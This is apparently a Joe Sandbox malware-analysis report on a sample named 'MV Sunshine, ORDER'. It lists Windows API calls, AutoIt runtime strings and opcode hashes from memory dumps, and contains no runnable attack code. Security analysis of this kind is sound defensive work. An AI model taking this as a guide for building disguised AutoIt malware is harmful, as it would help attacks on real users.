                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: BuffCharUpperVisibleWindow
                      • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                      • API String ID: 4105515805-45149045
                      • Opcode ID: 630b5e12d439549facc050bf959e4ee10c836ddf51c838f3e7cfe16c31a653d1
                      • Instruction ID: 1eee810acf6c4f5a08379257a78458540d0b06ea6b1e46a1b939219a5d038267
                      • Opcode Fuzzy Hash: 630b5e12d439549facc050bf959e4ee10c836ddf51c838f3e7cfe16c31a653d1
                      • Instruction Fuzzy Hash: D9D161712143099FCF14FF50D491B6AB7AAAFD5344F148459B8869B3E2CB31EE0ACB91
                      APIs
                      • SetTextColor.GDI32(?,00000000), ref: 00A0A89F
                      • GetSysColorBrush.USER32(0000000F), ref: 00A0A8D0
                      • GetSysColor.USER32(0000000F), ref: 00A0A8DC
                      • SetBkColor.GDI32(?,000000FF), ref: 00A0A8F6
                      • SelectObject.GDI32(?,?), ref: 00A0A905
                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00A0A930
                      • GetSysColor.USER32(00000010), ref: 00A0A938
                      • CreateSolidBrush.GDI32(00000000), ref: 00A0A93F
                      • FrameRect.USER32(?,?,00000000), ref: 00A0A94E
                      • DeleteObject.GDI32(00000000), ref: 00A0A955
                      • InflateRect.USER32(?,000000FE,000000FE), ref: 00A0A9A0
                      • FillRect.USER32(?,?,?), ref: 00A0A9D2
                      • GetWindowLongW.USER32(?,000000F0), ref: 00A0A9FD
                        • Part of subcall function 00A0AB60: GetSysColor.USER32(00000012), ref: 00A0AB99
                        • Part of subcall function 00A0AB60: SetTextColor.GDI32(?,?), ref: 00A0AB9D
                        • Part of subcall function 00A0AB60: GetSysColorBrush.USER32(0000000F), ref: 00A0ABB3
                        • Part of subcall function 00A0AB60: GetSysColor.USER32(0000000F), ref: 00A0ABBE
                        • Part of subcall function 00A0AB60: GetSysColor.USER32(00000011), ref: 00A0ABDB
                        • Part of subcall function 00A0AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00A0ABE9
                        • Part of subcall function 00A0AB60: SelectObject.GDI32(?,00000000), ref: 00A0ABFA
                        • Part of subcall function 00A0AB60: SetBkColor.GDI32(?,00000000), ref: 00A0AC03
                        • Part of subcall function 00A0AB60: SelectObject.GDI32(?,?), ref: 00A0AC10
                        • Part of subcall function 00A0AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 00A0AC2F
                        • Part of subcall function 00A0AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00A0AC46
                        • Part of subcall function 00A0AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 00A0AC5B
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                      • String ID:
                      • API String ID: 4124339563-0
                      • Opcode ID: 896ffd0502d68c7d1378cd27f608cc810165ee3aef7e382f3ea8c9bc58aa1174
                      • Instruction ID: c8fb618d4ddecd2b3f541c82a03a835bdee9c35d3b3f313656122fcc80df9503
                      • Opcode Fuzzy Hash: 896ffd0502d68c7d1378cd27f608cc810165ee3aef7e382f3ea8c9bc58aa1174
                      • Instruction Fuzzy Hash: F4A18172508309AFD720DFA4DC08E5B7BA9FF89321F104B29F962A61E0D771D946CB52
                      APIs
                      • DestroyWindow.USER32(?,?,?), ref: 00982CA2
                      • DeleteObject.GDI32(00000000), ref: 00982CE8
                      • DeleteObject.GDI32(00000000), ref: 00982CF3
                      • DestroyIcon.USER32(00000000,?,?,?), ref: 00982CFE
                      • DestroyWindow.USER32(00000000,?,?,?), ref: 00982D09
                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 009BC68B
                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 009BC6C4
                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 009BCAED
                        • Part of subcall function 00981B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00982036,?,00000000,?,?,?,?,009816CB,00000000,?), ref: 00981B9A
                      • SendMessageW.USER32(?,00001053), ref: 009BCB2A
                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 009BCB41
                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 009BCB57
                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 009BCB62
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                      • String ID: 0
                      • API String ID: 464785882-4108050209
                      • Opcode ID: 72ffdd06838245d493be7d24cc1ffc46263f4d1d0da9f718c42241ee90bd1547
                      • Instruction ID: 987d488319191de218d76c37071481a67d8213101391901c9699321f62fa92fd
                      • Opcode Fuzzy Hash: 72ffdd06838245d493be7d24cc1ffc46263f4d1d0da9f718c42241ee90bd1547
                      • Instruction Fuzzy Hash: A712A1B0604205EFDB24DF24C984BA9B7E9BF45320F5445B9F896DB662CB31EC42CB91
                      APIs
                      • DestroyWindow.USER32(00000000), ref: 009F77F1
                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 009F78B0
                      • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 009F78EE
                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 009F7900
                      • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 009F7946
                      • GetClientRect.USER32(00000000,?), ref: 009F7952
                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 009F7996
                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 009F79A5
                      • GetStockObject.GDI32(00000011), ref: 009F79B5
                      • SelectObject.GDI32(00000000,00000000), ref: 009F79B9
                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 009F79C9
                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009F79D2
                      • DeleteDC.GDI32(00000000), ref: 009F79DB
                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 009F7A07
                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 009F7A1E
                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 009F7A59
                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 009F7A6D
                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 009F7A7E
                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 009F7AAE
                      • GetStockObject.GDI32(00000011), ref: 009F7AB9
                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 009F7AC4
                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 009F7ACE
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                      • API String ID: 2910397461-517079104
                      • Opcode ID: 95263ebdec2e711398e27a64d6d82e39aac60b7e4fd0cda22a096131460b8947
                      • Instruction ID: 3f70d2f8d2badc841a089a849c556f8f928920afd95f5fa455186bdc6eb32800
                      • Opcode Fuzzy Hash: 95263ebdec2e711398e27a64d6d82e39aac60b7e4fd0cda22a096131460b8947
                      • Instruction Fuzzy Hash: 4EA16175A40219BFEB14DBA4DC4AFAEBBB9EB45710F044114FA15A72E0D7B1AD02CB60
                      APIs
                      • SetErrorMode.KERNEL32(00000001), ref: 009EAF89
                      • GetDriveTypeW.KERNEL32(?,00A0FAC0,?,\\.\,00A0F910), ref: 009EB066
                      • SetErrorMode.KERNEL32(00000000,00A0FAC0,?,\\.\,00A0F910), ref: 009EB1C4
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: ErrorMode$DriveType
                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                      • API String ID: 2907320926-4222207086
                      • Opcode ID: e027a0e22126529ee0fef9b8c1a5a745bcb7e0b29fa5fd2ae4c5e0606aceb434
                      • Instruction ID: 18f59452df6ddfab7947d20ff7d277e82df668a6cb97da7e045d7a65b8fa5d88
                      • Opcode Fuzzy Hash: e027a0e22126529ee0fef9b8c1a5a745bcb7e0b29fa5fd2ae4c5e0606aceb434
                      • Instruction Fuzzy Hash: C651C330688385BBCB12EB52C9E2A7E73B4BB64351B204C15F44AE7290C739AD41DB42
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: __wcsnicmp
                      • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                      • API String ID: 1038674560-86951937
                      • Opcode ID: 60eefc229094234096cac2c3c4259e7c3911b5772c2ea4e154536024ca2eac45
                      • Instruction ID: a1247f725e21cd154d300f3d0f48fdac0afb030b2316425e341de85086927298
                      • Opcode Fuzzy Hash: 60eefc229094234096cac2c3c4259e7c3911b5772c2ea4e154536024ca2eac45
                      • Instruction Fuzzy Hash: 66813671604215BBCB25BF60CD83FEE7B6CAF52710F048425F945AE2C2EB64EA51C3A1
                      APIs
                      • GetSysColor.USER32(00000012), ref: 00A0AB99
                      • SetTextColor.GDI32(?,?), ref: 00A0AB9D
                      • GetSysColorBrush.USER32(0000000F), ref: 00A0ABB3
                      • GetSysColor.USER32(0000000F), ref: 00A0ABBE
                      • CreateSolidBrush.GDI32(?), ref: 00A0ABC3
                      • GetSysColor.USER32(00000011), ref: 00A0ABDB
                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00A0ABE9
                      • SelectObject.GDI32(?,00000000), ref: 00A0ABFA
                      • SetBkColor.GDI32(?,00000000), ref: 00A0AC03
                      • SelectObject.GDI32(?,?), ref: 00A0AC10
                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00A0AC2F
                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00A0AC46
                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00A0AC5B
                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00A0ACA7
                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00A0ACCE
                      • InflateRect.USER32(?,000000FD,000000FD), ref: 00A0ACEC
                      • DrawFocusRect.USER32(?,?), ref: 00A0ACF7
                      • GetSysColor.USER32(00000011), ref: 00A0AD05
                      • SetTextColor.GDI32(?,00000000), ref: 00A0AD0D
                      • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00A0AD21
                      • SelectObject.GDI32(?,00A0A869), ref: 00A0AD38
                      • DeleteObject.GDI32(?), ref: 00A0AD43
                      • SelectObject.GDI32(?,?), ref: 00A0AD49
                      • DeleteObject.GDI32(?), ref: 00A0AD4E
                      • SetTextColor.GDI32(?,?), ref: 00A0AD54
                      • SetBkColor.GDI32(?,?), ref: 00A0AD5E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                      • String ID:
                      • API String ID: 1996641542-0
                      • Opcode ID: 892cc2f0d7fb3aa8e5a7392fbb3bdf96d0b78370cf9965c942873af5dc635a4a
                      • Instruction ID: e50b2f864f59fed3dba6129ad46a952c39d3d65564399dbd50869ab08beeb4ef
                      • Opcode Fuzzy Hash: 892cc2f0d7fb3aa8e5a7392fbb3bdf96d0b78370cf9965c942873af5dc635a4a
                      • Instruction Fuzzy Hash: 82612D7190021CAFDB21DFA4EC48AAE7B79EB09320F118225F915BB2E1D7759D42DB90
                      APIs
                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00A08D34
                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A08D45
                      • CharNextW.USER32(0000014E), ref: 00A08D74
                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00A08DB5
                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00A08DCB
                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A08DDC
                      • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00A08DF9
                      • SetWindowTextW.USER32(?,0000014E), ref: 00A08E45
                      • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00A08E5B
                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00A08E8C
                      • _memset.LIBCMT ref: 00A08EB1
                      • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00A08EFA
                      • _memset.LIBCMT ref: 00A08F59
                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00A08F83
                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 00A08FDB
                      • SendMessageW.USER32(?,0000133D,?,?), ref: 00A09088
                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00A090AA
                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00A090F4
                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00A09121
                      • DrawMenuBar.USER32(?), ref: 00A09130
                      • SetWindowTextW.USER32(?,0000014E), ref: 00A09158
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                      • String ID: 0
                      • API String ID: 1073566785-4108050209
                      • Opcode ID: a878a231bae9982dbef17ff1e8f3293fa58b25e8091e5e8a71f2c2cdb0d6a04d
                      • Instruction ID: 9637b9794d95190f193599be88d75197615d132c04250568932feeb27d024ea9
                      • Opcode Fuzzy Hash: a878a231bae9982dbef17ff1e8f3293fa58b25e8091e5e8a71f2c2cdb0d6a04d
                      • Instruction Fuzzy Hash: 6FE18D7490021DAEDF20DFA0DC88EEE7BB9EF05710F108255F955AA2D1DB748A82DF64
                      APIs
                      • GetCursorPos.USER32(?), ref: 00A04C51
                      • GetDesktopWindow.USER32 ref: 00A04C66
                      • GetWindowRect.USER32(00000000), ref: 00A04C6D
                      • GetWindowLongW.USER32(?,000000F0), ref: 00A04CCF
                      • DestroyWindow.USER32(?), ref: 00A04CFB
                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00A04D24
                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A04D42
                      • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00A04D68
                      • SendMessageW.USER32(?,00000421,?,?), ref: 00A04D7D
                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00A04D90
                      • IsWindowVisible.USER32(?), ref: 00A04DB0
                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00A04DCB
                      • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00A04DDF
                      • GetWindowRect.USER32(?,?), ref: 00A04DF7
                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00A04E1D
                      • GetMonitorInfoW.USER32(00000000,?), ref: 00A04E37
                      • CopyRect.USER32(?,?), ref: 00A04E4E
                      • SendMessageW.USER32(?,00000412,00000000), ref: 00A04EB9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                      • String ID: ($0$tooltips_class32
                      • API String ID: 698492251-4156429822
                      • Opcode ID: cc9e56ae3e248db5ed7b7dc86414715adc6ade1dd0af80c59ed1c184d2c56241
                      • Instruction ID: 7cabb0cfbd2cc396555bdf00f5dab120a236ec109ac8549f22ff16a7799cc3d7
                      • Opcode Fuzzy Hash: cc9e56ae3e248db5ed7b7dc86414715adc6ade1dd0af80c59ed1c184d2c56241
                      • Instruction Fuzzy Hash: 24B19DB1608344AFDB14DF64D844B6ABBE4FF89314F00891CF699AB2A1DB71EC05CB91
                      APIs
                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 009828BC
                      • GetSystemMetrics.USER32(00000007), ref: 009828C4
                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 009828EF
                      • GetSystemMetrics.USER32(00000008), ref: 009828F7
                      • GetSystemMetrics.USER32(00000004), ref: 0098291C
                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00982939
                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00982949
                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0098297C
                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00982990
                      • GetClientRect.USER32(00000000,000000FF), ref: 009829AE
                      • GetStockObject.GDI32(00000011), ref: 009829CA
                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 009829D5
                        • Part of subcall function 00982344: GetCursorPos.USER32(?), ref: 00982357
                        • Part of subcall function 00982344: ScreenToClient.USER32(00A467B0,?), ref: 00982374
                        • Part of subcall function 00982344: GetAsyncKeyState.USER32(00000001), ref: 00982399
                        • Part of subcall function 00982344: GetAsyncKeyState.USER32(00000002), ref: 009823A7
                      • SetTimer.USER32(00000000,00000000,00000028,00981256), ref: 009829FC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                      • String ID: AutoIt v3 GUI
                      • API String ID: 1458621304-248962490
                      • Opcode ID: 4dbf61c7770e015c1ec073015315945419aee24902e352687f08d38c6fff0f30
                      • Instruction ID: ce5a3e562112dec903f4e6e05df25c05c49d2eaaecef936e2bc9e999f154e267
                      • Opcode Fuzzy Hash: 4dbf61c7770e015c1ec073015315945419aee24902e352687f08d38c6fff0f30
                      • Instruction Fuzzy Hash: 39B18E75A0020AEFDF14EFA8DD45BED7BB4FB48714F108129FA15A7290DB74A842CB51
                      APIs
                      • CharUpperBuffW.USER32(?,?), ref: 00A040F6
                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00A041B6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: BuffCharMessageSendUpper
                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                      • API String ID: 3974292440-719923060
                      • Opcode ID: 593f6d447d5280711a25cee38dbda87aa4da70d82debba3835aa361ece0e5902
                      • Instruction ID: c326fd82bd19b4c34f7159c0d2efd055372a9ba854ebf36e422d2bf3d2d25dd7
                      • Opcode Fuzzy Hash: 593f6d447d5280711a25cee38dbda87aa4da70d82debba3835aa361ece0e5902
                      • Instruction Fuzzy Hash: E3A18EB02143059FCB14FF20D992B6AB3A5BFC9314F148969B99A9B3D2DB31EC05CB51
                      APIs
                      • LoadCursorW.USER32(00000000,00007F89), ref: 009F5309
                      • LoadCursorW.USER32(00000000,00007F8A), ref: 009F5314
                      • LoadCursorW.USER32(00000000,00007F00), ref: 009F531F
                      • LoadCursorW.USER32(00000000,00007F03), ref: 009F532A
                      • LoadCursorW.USER32(00000000,00007F8B), ref: 009F5335
                      • LoadCursorW.USER32(00000000,00007F01), ref: 009F5340
                      • LoadCursorW.USER32(00000000,00007F81), ref: 009F534B
                      • LoadCursorW.USER32(00000000,00007F88), ref: 009F5356
                      • LoadCursorW.USER32(00000000,00007F80), ref: 009F5361
                      • LoadCursorW.USER32(00000000,00007F86), ref: 009F536C
                      • LoadCursorW.USER32(00000000,00007F83), ref: 009F5377
                      • LoadCursorW.USER32(00000000,00007F85), ref: 009F5382
                      • LoadCursorW.USER32(00000000,00007F82), ref: 009F538D
                      • LoadCursorW.USER32(00000000,00007F84), ref: 009F5398
                      • LoadCursorW.USER32(00000000,00007F04), ref: 009F53A3
                      • LoadCursorW.USER32(00000000,00007F02), ref: 009F53AE
                      • GetCursorInfo.USER32(?), ref: 009F53BE
                      • GetLastError.KERNEL32(00000001,00000000), ref: 009F53E9
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
